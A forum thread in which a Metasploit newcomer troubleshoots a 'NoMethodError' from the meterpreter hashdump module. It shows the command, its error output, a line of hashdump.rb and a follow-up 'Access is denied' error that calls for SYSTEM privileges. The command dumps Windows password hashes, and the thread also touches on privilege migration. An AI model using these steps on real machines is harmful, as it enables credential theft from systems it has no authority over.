Hashdump gives a "NoMethodError" error?

Ky6000

When I try to use "run post/windows/gather/hashdump" on meterpreter I get a "NoMethodError", since i'm new to metasploit i'm probably doing something wrong.

meterpreter > run post/windows/gather/hashdump

[*] Obtaining the boot key...
[-] Post failed: NoMethodError undefined method `unpack' for nil:NilClass
[-] Call stack:
[-]   /usr/share/metasploit-framework/modules/post/windows/gather/hashdump.rb:44:in `run'

I get this error whenever I use the hashdump script. I have updated metasploit by using the msfupdate command, and updated kali by using "apt-get update, apt-get upgrade, apt-get dist-upgrade".

So why is hashdump doing this?

Thanks for any help.

Someone already reported it twice back in october.

https://github.com/rapid7/metasploit-framework/issues/6154
https://github.com/rapid7/metasploit-framework/issues/6160

No reactions to it as yet so I'm guessing the person in question had a botched install in some way and the Rapid7 crew are just ignoring him.

Try opening that hashdump.rb file and see what it's doing on line 44.

There is no difference between my hashdump.rb and the one on github. The error is occuring on this line:

print_status("Calculating the hboot key using SYSKEY #{bootkey.unpack("H*")[0]}...")

interestingly, this is just printing to the console, so when I remove it I get a new error,

[-] Meterpreter Exception: Rex::Post::Meterpreter::RequestError stdapi_registry_open_key: Operation failed: Access is denied.
[-] This script requires the use of a SYSTEM user context (hint: migrate into service process)

Access is denied!!?

I thought a meterpreter session had root access. To use psexec I had to change the registry, do I need to change it again? Also it is saying to migrate into service process, is that svchost? Because I have insufficient privileges to migrate there too.

Some of what I'm saying may make no sense since I am new to this, for which I apologize.

Thanks for the reply.